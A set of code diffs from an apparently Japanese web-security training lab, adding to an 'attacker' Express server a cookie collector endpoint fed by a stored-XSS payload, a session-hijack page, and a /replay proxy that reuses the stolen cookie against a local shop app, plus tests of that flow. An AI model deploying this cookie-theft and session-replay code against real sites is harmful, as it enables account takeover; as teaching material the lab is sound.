+        "escape-html": "~1.0.3",
+        "etag": "~1.8.1",
+        "fresh": "0.5.2",
+        "http-errors": "2.0.0",
+        "mime": "1.6.0",
+        "ms": "2.1.3",
+        "on-finished": "2.4.1",
+        "range-parser": "~1.2.1",
+        "statuses": "2.0.1"
+      },
+      "engines": {
+        "node": ">= 0.8.0"
+      }
+    },
+    "node_modules/send/node_modules/encodeurl": {
+      "version": "1.0.2",
+      "resolved": "https://registry.npmjs.org/encodeurl/-/encodeurl-1.0.2.tgz",
+      "integrity": "sha512-TPJXq8JqFaVYm2CWmPvnP2Iyo4ZSM7/QKcSmuMLDObfpH5fi7RUGmd/rTDf+rut/saiDiQEeVTNgAmJEdAOx0w==",
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/send/node_modules/ms": {
+      "version": "2.1.3",
+      "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz",
+      "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA=="
+    },
+    "node_modules/serve-static": {
+      "version": "1.16.2",
+      "resolved": "https://registry.npmjs.org/serve-static/-/serve-static-1.16.2.tgz",
+      "integrity": "sha512-VqpjJZKadQB/PEbEwvFdO43Ax5dFBZ2UECszz8bQ7pi7wt//PWe1P6MN7eCnjsatYtBT6EuiClbjSWP2WrIoTw==",
+      "dependencies": {
+        "encodeurl": "~2.0.0",
+        "escape-html": "~1.0.3",
+        "parseurl": "~1.3.3",
+        "send": "0.19.0"
+      },
+      "engines": {
+        "node": ">= 0.8.0"
+      }
+    },
+    "node_modules/setprototypeof": {
+      "version": "1.2.0",
+      "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.2.0.tgz",
+      "integrity": "sha512-E5LDX7Wrp85Kil5bhZv46j8jOeboKq5JMmYM3gVGdGH8xFpPWXUMsNrlODCrkoxMEeNi/XZIwuRvY4XNwYMJpw=="
+    },
+    "node_modules/side-channel": {
+      "version": "1.1.0",
+      "resolved": "https://registry.npmjs.org/side-channel/-/side-channel-1.1.0.tgz",
+      "integrity": "sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw==",
+      "dependencies": {
+        "es-errors": "^1.3.0",
+        "object-inspect": "^1.13.3",
+        "side-channel-list": "^1.0.0",
+        "side-channel-map": "^1.0.1",
+        "side-channel-weakmap": "^1.0.2"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
+      }
+    },
+    "node_modules/side-channel-list": {
+      "version": "1.0.0",
+      "resolved": "https://registry.npmjs.org/side-channel-list/-/side-channel-list-1.0.0.tgz",
+      "integrity": "sha512-FCLHtRD/gnpCiCHEiJLOwdmFP+wzCmDEkc9y7NsYxeF4u7Btsn1ZuwgwJGxImImHicJArLP4R0yX4c2KCrMrTA==",
+      "dependencies": {
+        "es-errors": "^1.3.0",
+        "object-inspect": "^1.13.3"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
+      }
+    },
+    "node_modules/side-channel-map": {
+      "version": "1.0.1",
+      "resolved": "https://registry.npmjs.org/side-channel-map/-/side-channel-map-1.0.1.tgz",
+      "integrity": "sha512-VCjCNfgMsby3tTdo02nbjtM/ewra6jPHmpThenkTYh8pG9ucZ/1P8So4u4FGBek/BjpOVsDCMoLA/iuBKIFXRA==",
+      "dependencies": {
+        "call-bound": "^1.0.2",
+        "es-errors": "^1.3.0",
+        "get-intrinsic": "^1.2.5",
+        "object-inspect": "^1.13.3"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
+      }
+    },
+    "node_modules/side-channel-weakmap": {
+      "version": "1.0.2",
+      "resolved": "https://registry.npmjs.org/side-channel-weakmap/-/side-channel-weakmap-1.0.2.tgz",
+      "integrity": "sha512-WPS/HvHQTYnHisLo9McqBHOJk2FkHO/tlpvldyrnem4aeQp4hai3gythswg6p01oSoTl58rcpiFAjF2br2Ak2A==",
+      "dependencies": {
+        "call-bound": "^1.0.2",
+        "es-errors": "^1.3.0",
+        "get-intrinsic": "^1.2.5",
+        "object-inspect": "^1.13.3",
+        "side-channel-map": "^1.0.1"
+      },
+      "engines": {
+        "node": ">= 0.4"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/ljharb"
+      }
+    },
+    "node_modules/statuses": {
+      "version": "2.0.1",
+      "resolved": "https://registry.npmjs.org/statuses/-/statuses-2.0.1.tgz",
+      "integrity": "sha512-RwNA9Z/7PrK06rYLIzFMlaF+l73iwpzsqRIFgbMLbTcLD6cOao82TaWefPXQvB2fOC4AjuYSEndS7N/mTCbkdQ==",
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/toidentifier": {
+      "version": "1.0.1",
+      "resolved": "https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz",
+      "integrity": "sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==",
+      "engines": {
+        "node": ">=0.6"
+      }
+    },
+    "node_modules/type-is": {
+      "version": "1.6.18",
+      "resolved": "https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz",
+      "integrity": "sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g==",
+      "dependencies": {
+        "media-typer": "0.3.0",
+        "mime-types": "~2.1.24"
+      },
+      "engines": {
+        "node": ">= 0.6"
+      }
+    },
+    "node_modules/unpipe": {
+      "version": "1.0.0",
+      "resolved": "https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz",
+      "integrity": "sha512-pjy2bYhSsufwWlKwPc+l3cN7+wuJlK6uz0YdJEOlQDbl6jo/YlPi4mb8agUkVC8BF7V8NuzeyPNqRksA3hztKQ==",
+      "engines": {
+        "node": ">= 0.8"
+      }
+    },
+    "node_modules/utils-merge": {
+      "version": "1.0.1",
+      "resolved": "https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz",
+      "integrity": "sha512-pMZTvIkT1d+TFGvDOqodOclx0QWkkgi6Tdoa8gC8ffGAAqz9pzPTZWAybbsHHoED/ztMtkv/VoYTYyShUn81hA==",
+      "engines": {
+        "node": ">= 0.4.0"
+      }
+    },
+    "node_modules/vary": {
+      "version": "1.1.2",
+      "resolved": "https://registry.npmjs.org/vary/-/vary-1.1.2.tgz",
+      "integrity": "sha512-BNGbWLfd0eUPabhkXUVm0j8uuvREyTh5ovRa/dyow/BqAbZJyC+5fU+IzQOzmAKzYqYRAISoRhdQr3eIZ/PXqg==",
+      "engines": {
+        "node": ">= 0.8"
+      }
+    }
+  }
+}

--- a/apps/attacker/package.json
+++ b/apps/attacker/package.json
@@ -5,7 +5,8 @@
   "type": "commonjs",
   "main": "server.js",
   "scripts": {
-    "start": "node server.js"
+    "start": "node server.js",
+    "test": "node test/server.test.js"
   },
   "dependencies": {
     "express": "4.21.2",

--- a/apps/attacker/public/index.html
+++ b/apps/attacker/public/index.html
@@ -81,6 +81,11 @@
           <a class="btn" href="/auto-purchase">自動購入を開く</a>
         </div>
         <div class="card">
+          <h3>セッションハイジャック</h3>
+          <p>XSS で盗まれた Cookie を確認し、被害者セッションの再利用へ進みます。</p>
+          <a class="btn" href="/session-hijack">Session Hijack を開く</a>
+        </div>
+        <div class="card">
           <h3>ステータス</h3>
           <p>現在のターゲット: <code id="targetBase"></code></p>
           <p>環境変数 <code>TARGET_BASE</code> で変更できます。</p>

--- a/apps/attacker/public/session_hijack.html
+++ b/apps/attacker/public/session_hijack.html
@@ -1,136 +1,127 @@
-<!doctype html>
-<html lang="ja">
-  <head>
-    <meta charset="utf-8" />
-    <meta name="viewport" content="width=device-width, initial-scale=1" />
-    <title>Session Hijack Demo</title>
-    <style>
-      :root { color-scheme: dark; }
-      body {
-        margin: 0;
-        min-height: 100vh;
-        font-family: system-ui, -apple-system, "Segoe UI", sans-serif;
-        background:
-          radial-gradient(circle at top left, rgba(255, 92, 92, 0.35), transparent 34%),
-          linear-gradient(180deg, #12070b 0%, #0a0d14 100%);
-        color: #f5f5f8;
-      }
-      .wrap {
-        max-width: 960px;
-        margin: 0 auto;
-        padding: 40px 16px 56px;
-      }
-      .eyebrow {
-        display: inline-block;
-        padding: 6px 10px;
-        border-radius: 999px;
-        background: rgba(255, 107, 107, 0.16);
-        color: #ff9e9e;
-        font-size: 12px;
-        font-weight: 700;
-        letter-spacing: 0.08em;
-      }
-      h1 {
-        margin: 12px 0 10px;
-        font-size: 36px;
-      }
-      .subtitle {
-        margin: 0 0 24px;
-        color: #cfced9;
-        max-width: 720px;
-      }
-      .grid {
-        display: grid;
-        grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
-        gap: 18px;
-      }
-      .card {
-        background: rgba(14, 17, 25, 0.92);
-        border: 1px solid rgba(255, 116, 116, 0.18);
-        border-radius: 18px;
-        padding: 20px;
-        box-shadow: 0 18px 45px rgba(0, 0, 0, 0.28);
-      }
-      .card h2 {
-        margin: 0 0 10px;
-        font-size: 20px;
-      }
-      .card p, .card li {
-        color: #d4d6df;
-      }
-      .cookie-box {
-        min-height: 84px;
-        margin-top: 12px;
-        padding: 14px;
-        border-radius: 12px;
-        background: #07090f;
-        border: 1px dashed rgba(255, 158, 158, 0.28);
-        word-break: break-all;
-        font-family: ui-monospace, SFMono-Regular, Menlo, monospace;
-      }
-      .btn {
-        display: inline-block;
-        margin-top: 14px;
-        padding: 11px 16px;
-        border-radius: 10px;
-        background: #df4040;
-        color: #fff;
-        font-weight: 700;
-        text-decoration: none;
-      }
-      .muted {
-        color: #9ea3b2;
-        font-size: 13px;
-      }
-      ol {
-        margin: 0;
-        padding-left: 20px;
-      }
-      code {
-        padding: 2px 6px;
-        border-radius: 6px;
-        background: #11151f;
-      }
-    </style>
-  </head>
-  <body>
-    <div class="wrap">
-      <span class="eyebrow">SESSION HIJACK</span>
-      <h1>盗まれたCookieを確認する</h1>
-      <p class="subtitle">
-        保存型XSSで被害者ブラウザから送られた <code>document.cookie</code> をここで受け取ります。
-        次の Task では、この Cookie を使って被害者セッションを再利用します。
-      </p>
+<style>
+  :root { color-scheme: dark; }
+  body {
+    margin: 0;
+    min-height: 100vh;
+    font-family: system-ui, -apple-system, "Segoe UI", sans-serif;
+    background:
+      radial-gradient(circle at top left, rgba(255, 92, 92, 0.35), transparent 34%),
+      linear-gradient(180deg, #12070b 0%, #0a0d14 100%);
+    color: #f5f5f8;
+  }
+  .wrap {
+    max-width: 960px;
+    margin: 0 auto;
+    padding: 40px 16px 56px;
+  }
+  .eyebrow {
+    display: inline-block;
+    padding: 6px 10px;
+    border-radius: 999px;
+    background: rgba(255, 107, 107, 0.16);
+    color: #ff9e9e;
+    font-size: 12px;
+    font-weight: 700;
+    letter-spacing: 0.08em;
+  }
+  h1 {
+    margin: 12px 0 10px;
+    font-size: 36px;
+  }
+  .subtitle {
+    margin: 0 0 24px;
+    color: #cfced9;
+    max-width: 720px;
+  }
+  .grid {
+    display: grid;
+    grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
+    gap: 18px;
+  }
+  .card {
+    background: rgba(14, 17, 25, 0.92);
+    border: 1px solid rgba(255, 116, 116, 0.18);
+    border-radius: 18px;
+    padding: 20px;
+    box-shadow: 0 18px 45px rgba(0, 0, 0, 0.28);
+  }
+  .card h2 {
+    margin: 0 0 10px;
+    font-size: 20px;
+  }
+  .card p, .card li {
+    color: #d4d6df;
+  }
+  .cookie-box {
+    min-height: 84px;
+    margin-top: 12px;
+    padding: 14px;
+    border-radius: 12px;
+    background: #07090f;
+    border: 1px dashed rgba(255, 158, 158, 0.28);
+    word-break: break-all;
+    font-family: ui-monospace, SFMono-Regular, Menlo, monospace;
+  }
+  .btn {
+    display: inline-block;
+    margin-top: 14px;
+    padding: 11px 16px;
+    border-radius: 10px;
+    background: #df4040;
+    color: #fff;
+    font-weight: 700;
+    text-decoration: none;
+  }
+  .muted {
+    color: #9ea3b2;
+    font-size: 13px;
+  }
+  ol {
+    margin: 0;
+    padding-left: 20px;
+  }
+  code {
+    padding: 2px 6px;
+    border-radius: 6px;
+    background: #11151f;
+  }
+</style>
 
-      <div class="grid">
-        <section class="card">
-          <h2>盗まれたCookie</h2>
-          <p>被害者が XSS を踏むと、直近の値がここに表示されます。</p>
-          <div id="stolenCookie" class="cookie-box">まだ Cookie は盗まれていません。</div>
-          <div class="muted">受信先: <code>/collect?cookie=...</code></div>
-          <a class="btn" href="/replay?path=%2Forders">盗んだセッションで注文履歴を見る</a>
-        </section>
+<div class="wrap">
+  <span class="eyebrow">SESSION HIJACK</span>
+  <h1>盗まれたCookieを確認する</h1>
+  <p class="subtitle">
+    保存型XSSで被害者ブラウザから送られた <code>document.cookie</code> をここで受け取ります。
+    この Cookie を使って、被害者セッションを再利用できます。
+  </p>
 
-        <section class="card">
-          <h2>再現手順</h2>
-          <ol>
-            <li>Shop に <code>alice / password123</code> でログインする</li>
-            <li>商品コメントへ Cookie 送信用の XSS を投稿する</li>
-            <li>商品詳細を再表示し、Attacker 側へ Cookie が送られる</li>
-            <li>この画面で stolen cookie を確認する</li>
-            <li>上のボタンで <code>/orders</code> を開き、被害者の注文履歴を閲覧できることを確認する</li>
-          </ol>
-          <a class="btn" href="/">攻撃者ポータルへ戻る</a>
-        </section>
-      </div>
-    </div>
+  <div class="grid">
+    <section class="card">
+      <h2>盗まれたCookie</h2>
+      <p>被害者が XSS を踏むと、直近の値がここに表示されます。</p>
+      <div id="stolenCookie" class="cookie-box">まだ Cookie は盗まれていません。</div>
+      <div class="muted">受信先: <code>/collect?cookie=...</code></div>
+      <a class="btn" href="/replay?path=%2Forders">盗んだセッションで注文履歴を見る</a>
+    </section>
 
-    <script>
-      var cookie = window.__LAST_STOLEN_COOKIE__ || "";
-      var el = document.getElementById("stolenCookie");
-      if (el && cookie) {
-        el.textContent = cookie;
-      }
-    </script>
-  </body>
-</html>
+    <section class="card">
+      <h2>再現手順</h2>
+      <ol>
+        <li>Shop に <code>alice / password123</code> でログインする</li>
+        <li>商品コメントへ Cookie 送信用の XSS を投稿する</li>
+        <li>商品詳細を再表示し、Attacker 側へ Cookie が送られる</li>
+        <li>この画面で stolen cookie を確認する</li>
+        <li>上のボタンで <code>/orders</code> を開き、被害者の注文履歴を閲覧できることを確認する</li>
+      </ol>
+      <a class="btn" href="/">攻撃者ポータルへ戻る</a>
+    </section>
+  </div>
+</div>
+
+<script>
+  var cookie = window.__LAST_STOLEN_COOKIE__ || "";
+  var el = document.getElementById("stolenCookie");
+  if (el && cookie) {
+    el.textContent = cookie;
+  }
+</script>

--- a/apps/attacker/public/session_hijack.html
+++ b/apps/attacker/public/session_hijack.html
@@ -1,0 +1,134 @@
+<!doctype html>
+<html lang="ja">
+  <head>
+    <meta charset="utf-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1" />
+    <title>Session Hijack Demo</title>
+    <style>
+      :root { color-scheme: dark; }
+      body {
+        margin: 0;
+        min-height: 100vh;
+        font-family: system-ui, -apple-system, "Segoe UI", sans-serif;
+        background:
+          radial-gradient(circle at top left, rgba(255, 92, 92, 0.35), transparent 34%),
+          linear-gradient(180deg, #12070b 0%, #0a0d14 100%);
+        color: #f5f5f8;
+      }
+      .wrap {
+        max-width: 960px;
+        margin: 0 auto;
+        padding: 40px 16px 56px;
+      }
+      .eyebrow {
+        display: inline-block;
+        padding: 6px 10px;
+        border-radius: 999px;
+        background: rgba(255, 107, 107, 0.16);
+        color: #ff9e9e;
+        font-size: 12px;
+        font-weight: 700;
+        letter-spacing: 0.08em;
+      }
+      h1 {
+        margin: 12px 0 10px;
+        font-size: 36px;
+      }
+      .subtitle {
+        margin: 0 0 24px;
+        color: #cfced9;
+        max-width: 720px;
+      }
+      .grid {
+        display: grid;
+        grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
+        gap: 18px;
+      }
+      .card {
+        background: rgba(14, 17, 25, 0.92);
+        border: 1px solid rgba(255, 116, 116, 0.18);
+        border-radius: 18px;
+        padding: 20px;
+        box-shadow: 0 18px 45px rgba(0, 0, 0, 0.28);
+      }
+      .card h2 {
+        margin: 0 0 10px;
+        font-size: 20px;
+      }
+      .card p, .card li {
+        color: #d4d6df;
+      }
+      .cookie-box {
+        min-height: 84px;
+        margin-top: 12px;
+        padding: 14px;
+        border-radius: 12px;
+        background: #07090f;
+        border: 1px dashed rgba(255, 158, 158, 0.28);
+        word-break: break-all;
+        font-family: ui-monospace, SFMono-Regular, Menlo, monospace;
+      }
+      .btn {
+        display: inline-block;
+        margin-top: 14px;
+        padding: 11px 16px;
+        border-radius: 10px;
+        background: #df4040;
+        color: #fff;
+        font-weight: 700;
+        text-decoration: none;
+      }
+      .muted {
+        color: #9ea3b2;
+        font-size: 13px;
+      }
+      ol {
+        margin: 0;
+        padding-left: 20px;
+      }
+      code {
+        padding: 2px 6px;
+        border-radius: 6px;
+        background: #11151f;
+      }
+    </style>
+  </head>
+  <body>
+    <div class="wrap">
+      <span class="eyebrow">SESSION HIJACK</span>
+      <h1>盗まれたCookieを確認する</h1>
+      <p class="subtitle">
+        保存型XSSで被害者ブラウザから送られた <code>document.cookie</code> をここで受け取ります。
+        次の Task では、この Cookie を使って被害者セッションを再利用します。
+      </p>
+
+      <div class="grid">
+        <section class="card">
+          <h2>盗まれたCookie</h2>
+          <p>被害者が XSS を踏むと、直近の値がここに表示されます。</p>
+          <div id="stolenCookie" class="cookie-box">まだ Cookie は盗まれていません。</div>
+          <div class="muted">受信先: <code>/collect?cookie=...</code></div>
+        </section>
+
+        <section class="card">
+          <h2>再現手順</h2>
+          <ol>
+            <li>Shop に <code>alice / password123</code> でログインする</li>
+            <li>商品コメントへ Cookie 送信用の XSS を投稿する</li>
+            <li>商品詳細を再表示し、Attacker 側へ Cookie が送られる</li>
+            <li>この画面で stolen cookie を確認する</li>
+          </ol>
+          <a class="btn" href="/">攻撃者ポータルへ戻る</a>
+        </section>
+      </div>
+    </div>
+
+    <script>
+      var cookie = window.__LAST_STOLEN_COOKIE__ || "";
+      var el = document.getElementById("stolenCookie");
+      if (el && cookie) {
+        el.textContent = cookie;
+      }
+    </script>
+  </body>
+</html>

--- a/apps/attacker/public/session_hijack.html
+++ b/apps/attacker/public/session_hijack.html
@@ -108,6 +108,7 @@
           <p>被害者が XSS を踏むと、直近の値がここに表示されます。</p>
           <div id="stolenCookie" class="cookie-box">まだ Cookie は盗まれていません。</div>
           <div class="muted">受信先: <code>/collect?cookie=...</code></div>
+          <a class="btn" href="/replay?path=%2Forders">盗んだセッションで注文履歴を見る</a>
         </section>
 
         <section class="card">
@@ -117,6 +118,7 @@
             <li>商品コメントへ Cookie 送信用の XSS を投稿する</li>
             <li>商品詳細を再表示し、Attacker 側へ Cookie が送られる</li>
             <li>この画面で stolen cookie を確認する</li>
+            <li>上のボタンで <code>/orders</code> を開き、被害者の注文履歴を閲覧できることを確認する</li>
           </ol>
           <a class="btn" href="/">攻撃者ポータルへ戻る</a>
         </section>

--- a/apps/attacker/server.js
+++ b/apps/attacker/server.js
@@ -1,5 +1,7 @@
 const fs = require("fs");
 const path = require("path");
+const http = require("http");
+const https = require("https");
 const express = require("express");
 const morgan = require("morgan");
 
@@ -47,6 +49,33 @@ function createApp(options) {
     });
   }
 
+  function normalizeReplayPath(inputPath) {
+    const replayPath = String(inputPath || "/orders");
+    if (replayPath.charAt(0) !== "/") {
+      return null;
+    }
+    return replayPath;
+  }
+
+  function proxyWithStolenCookie(replayPath, callback) {
+    const targetUrl = new URL(config.targetBase);
+    const transport = targetUrl.protocol === "https:" ? https : http;
+    const requestOptions = {
+      protocol: targetUrl.protocol,
+      hostname: targetUrl.hostname,
+      port: targetUrl.port || (targetUrl.protocol === "https:" ? 443 : 80),
+      path: replayPath,
+      method: "GET",
+      headers: {
+        cookie: config.state.lastStolenCookie
+      }
+    };
+
+    const req = transport.request(requestOptions, callback);
+    req.on("error", callback);
+    req.end();
+  }
+
   app.get("/csrf", (req, res) => {
     res.setHeader("content-type", "text/html; charset=utf-8");
     res.send(render("csrf.html"));
@@ -70,6 +99,31 @@ function createApp(options) {
   app.get("/session-hijack", (req, res) => {
     res.setHeader("content-type", "text/html; charset=utf-8");
     res.send(render("session_hijack.html"));
+  });
+
+  app.get("/replay", (req, res) => {
+    const replayPath = normalizeReplayPath(req.query.path);
+    if (!config.state.lastStolenCookie) {
+      return res.status(400).send("No stolen cookie collected yet");
+    }
+    if (!replayPath) {
+      return res.status(400).send("Invalid replay path");
+    }
+
+    proxyWithStolenCookie(replayPath, (upstream) => {
+      if (upstream instanceof Error) {
+        if (!res.headersSent) {
+          res.status(502).send("Replay failed");
+        }
+        return;
+      }
+
+      res.status(upstream.statusCode || 200);
+      if (upstream.headers["content-type"]) {
+        res.setHeader("content-type", upstream.headers["content-type"]);
+      }
+      upstream.pipe(res);
+    });
   });
 
   app.locals.config = config;

--- a/apps/attacker/server.js
+++ b/apps/attacker/server.js
@@ -3,13 +3,10 @@ const path = require("path");
 const express = require("express");
 const morgan = require("morgan");
 
-const PORT = Number(process.env.PORT || 5000);
-const TARGET_BASE = process.env.TARGET_BASE || "http://localhost:4000";
+const DEFAULT_PORT = Number(process.env.PORT || 5000);
+const DEFAULT_TARGET_BASE = process.env.TARGET_BASE || "http://localhost:4000";
 
-const app = express();
-app.use(morgan("dev"));
-
-function renderPage(filename) {
+function renderPage(filename, pageData) {
   const body = fs.readFileSync(path.join(__dirname, "public", filename), "utf8");
   return `<!doctype html>
 <html lang="ja">
@@ -20,31 +17,82 @@ function renderPage(filename) {
   </head>
   <body>
     <script>
-      window.__TARGET_BASE__ = ${JSON.stringify(TARGET_BASE)};
+      window.__TARGET_BASE__ = ${JSON.stringify(pageData.targetBase)};
+      window.__LAST_STOLEN_COOKIE__ = ${JSON.stringify(pageData.lastStolenCookie)};
     </script>
     ${body}
   </body>
 </html>`;
 }
 
-app.get("/csrf", (req, res) => {
-  res.setHeader("content-type", "text/html; charset=utf-8");
-  res.send(renderPage("csrf.html"));
-});
+function createApp(options) {
+  const config = Object.assign(
+    {
+      targetBase: DEFAULT_TARGET_BASE,
+      logger: morgan("dev"),
+      state: { lastStolenCookie: "" }
+    },
+    options || {}
+  );
 
-app.get("/", (req, res) => {
-  res.setHeader("content-type", "text/html; charset=utf-8");
-  res.send(renderPage("index.html"));
-});
+  const app = express();
+  if (config.logger) {
+    app.use(config.logger);
+  }
 
-app.get("/auto-purchase", (req, res) => {
-  res.setHeader("content-type", "text/html; charset=utf-8");
-  res.send(renderPage("auto_purchase.html"));
-});
+  function render(filename) {
+    return renderPage(filename, {
+      targetBase: config.targetBase,
+      lastStolenCookie: config.state.lastStolenCookie || ""
+    });
+  }
 
-app.listen(PORT, () => {
-  // eslint-disable-next-line no-console
-  console.log(`[attacker] listening on http://localhost:${PORT}`);
-  // eslint-disable-next-line no-console
-  console.log(`[attacker] TARGET_BASE=${TARGET_BASE}`);
-});
+  app.get("/csrf", (req, res) => {
+    res.setHeader("content-type", "text/html; charset=utf-8");
+    res.send(render("csrf.html"));
+  });
+
+  app.get("/", (req, res) => {
+    res.setHeader("content-type", "text/html; charset=utf-8");
+    res.send(render("index.html"));
+  });
+
+  app.get("/auto-purchase", (req, res) => {
+    res.setHeader("content-type", "text/html; charset=utf-8");
+    res.send(render("auto_purchase.html"));
+  });
+
+  app.get("/collect", (req, res) => {
+    config.state.lastStolenCookie = String(req.query.cookie || "");
+    res.status(204).end();
+  });
+
+  app.get("/session-hijack", (req, res) => {
+    res.setHeader("content-type", "text/html; charset=utf-8");
+    res.send(render("session_hijack.html"));
+  });
+
+  app.locals.config = config;
+  return app;
+}
+
+function startServer(options) {
+  const config = Object.assign({ port: DEFAULT_PORT, host: undefined }, options || {});
+  const app = createApp(config);
+  const server = app.listen(config.port, config.host, () => {
+    // eslint-disable-next-line no-console
+    console.log(`[attacker] listening on http://localhost:${server.address().port}`);
+    // eslint-disable-next-line no-console
+    console.log(`[attacker] TARGET_BASE=${config.targetBase || DEFAULT_TARGET_BASE}`);
+  });
+  return { app: app, server: server };
+}
+
+if (require.main === module) {
+  startServer();
+}
+
+module.exports = {
+  createApp: createApp,
+  startServer: startServer
+};

--- a/apps/attacker/test/server.test.js
+++ b/apps/attacker/test/server.test.js
@@ -33,6 +33,26 @@ function makeRequest(port, pathname) {
   });
 }
 
+function withTargetServer(handler, run) {
+  const server = http.createServer(handler);
+  return new Promise((resolve, reject) => {
+    server.listen(0, "127.0.0.1", async () => {
+      try {
+        await run(server);
+        server.close((error) => {
+          if (error) {
+            reject(error);
+            return;
+          }
+          resolve();
+        });
+      } catch (error) {
+        server.close(() => reject(error));
+      }
+    });
+  });
+}
+
 async function withServer(run) {
   const started = startServer({ port: 0, host: "127.0.0.1", logger: null });
   try {
@@ -82,9 +102,65 @@ async function testCollectAndSessionHijackPageShowStolenCookie() {
   });
 }
 
+async function testReplayFlow() {
+  let seenCookie = "";
+  let seenPath = "";
+
+  await withTargetServer((req, res) => {
+    seenCookie = req.headers.cookie || "";
+    seenPath = req.url;
+    res.statusCode = 200;
+    res.setHeader("content-type", "text/html; charset=utf-8");
+    res.end("<h1>注文履歴</h1><div>alice_secret_order</div>");
+  }, async (targetServer) => {
+    const targetPort = targetServer.address().port;
+    const started = startServer({
+      port: 0,
+      host: "127.0.0.1",
+      logger: null,
+      targetBase: "http://127.0.0.1:" + targetPort
+    });
+
+    try {
+      await new Promise((resolve, reject) => {
+        if (started.server.listening) {
+          resolve();
+          return;
+        }
+        started.server.once("listening", resolve);
+        started.server.once("error", reject);
+      });
+
+      const port = started.server.address().port;
+      const collected = await makeRequest(port, "/collect?cookie=connect.sid%3Dstolen-cookie");
+      assert.strictEqual(collected.statusCode, 204);
+
+      const page = await makeRequest(port, "/session-hijack");
+      assert(page.body.includes("/replay?path=%2Forders"));
+
+      const replay = await makeRequest(port, "/replay?path=%2Forders");
+      assert.strictEqual(replay.statusCode, 200);
+      assert(replay.body.includes("alice_secret_order"));
+      assert.strictEqual(seenCookie, "connect.sid=stolen-cookie");
+      assert.strictEqual(seenPath, "/orders");
+    } finally {
+      await new Promise((resolve, reject) => {
+        started.server.close((error) => {
+          if (error) {
+            reject(error);
+            return;
+          }
+          resolve();
+        });
+      });
+    }
+  });
+}
+
 async function run() {
   await testTopPageShowsSessionHijackEntry();
   await testCollectAndSessionHijackPageShowStolenCookie();
+  await testReplayFlow();
 }
 
 run().catch((error) => {

--- a/apps/attacker/test/server.test.js
+++ b/apps/attacker/test/server.test.js
@@ -1,0 +1,93 @@
+const assert = require("assert");
+const http = require("http");
+
+const { startServer } = require("../server");
+
+function makeRequest(port, pathname) {
+  return new Promise((resolve, reject) => {
+    const req = http.request(
+      {
+        hostname: "127.0.0.1",
+        port: port,
+        path: pathname,
+        method: "GET"
+      },
+      (res) => {
+        let body = "";
+        res.setEncoding("utf8");
+        res.on("data", (chunk) => {
+          body += chunk;
+        });
+        res.on("end", () => {
+          resolve({
+            statusCode: res.statusCode,
+            headers: res.headers,
+            body: body
+          });
+        });
+      }
+    );
+
+    req.on("error", reject);
+    req.end();
+  });
+}
+
+async function withServer(run) {
+  const started = startServer({ port: 0, host: "127.0.0.1", logger: null });
+  try {
+    await new Promise((resolve, reject) => {
+      if (started.server.listening) {
+        resolve();
+        return;
+      }
+      started.server.once("listening", resolve);
+      started.server.once("error", reject);
+    });
+    await run(started.server.address().port);
+  } finally {
+    if (!started.server.listening) {
+      return;
+    }
+    await new Promise((resolve, reject) => {
+      started.server.close((error) => {
+        if (error) {
+          reject(error);
+          return;
+        }
+        resolve();
+      });
+    });
+  }
+}
+
+async function testTopPageShowsSessionHijackEntry() {
+  await withServer(async (port) => {
+    const response = await makeRequest(port, "/");
+    assert.strictEqual(response.statusCode, 200);
+    assert(response.body.includes("セッションハイジャック"));
+    assert(response.body.includes("/session-hijack"));
+  });
+}
+
+async function testCollectAndSessionHijackPageShowStolenCookie() {
+  await withServer(async (port) => {
+    const collected = await makeRequest(port, "/collect?cookie=connect.sid%3Ddemo123");
+    assert.strictEqual(collected.statusCode, 204);
+
+    const page = await makeRequest(port, "/session-hijack");
+    assert.strictEqual(page.statusCode, 200);
+    assert(page.body.includes("connect.sid=demo123"));
+    assert(page.body.includes("盗まれたCookie"));
+  });
+}
+
+async function run() {
+  await testTopPageShowsSessionHijackEntry();
+  await testCollectAndSessionHijackPageShowStolenCookie();
+}
+
+run().catch((error) => {
+  console.error(error);
+  process.exit(1);
+});

--- a/apps/shop/src/server.js
+++ b/apps/shop/src/server.js
@@ -143,7 +143,11 @@ app.get("/", (req, res) => {
 });
 
 app.get("/hands-on", (req, res) => {
-  res.render("hands_on", { currentUser: res.locals.currentUser, attackerUrl: ATTACKER_URL + "/csrf" });
+  res.render("hands_on", {
+    currentUser: res.locals.currentUser,
+    attackerUrl: ATTACKER_URL + "/csrf",
+    attackerSessionHijackUrl: ATTACKER_URL + "/session-hijack"
+  });
 });
 
 app.get("/register", (req, res) => {

--- a/apps/shop/src/server.js
+++ b/apps/shop/src/server.js
@@ -146,6 +146,7 @@ app.get("/hands-on", (req, res) => {
   res.render("hands_on", {
     currentUser: res.locals.currentUser,
     attackerUrl: ATTACKER_URL + "/csrf",
+    attackerCollectorUrl: ATTACKER_URL + "/collect",
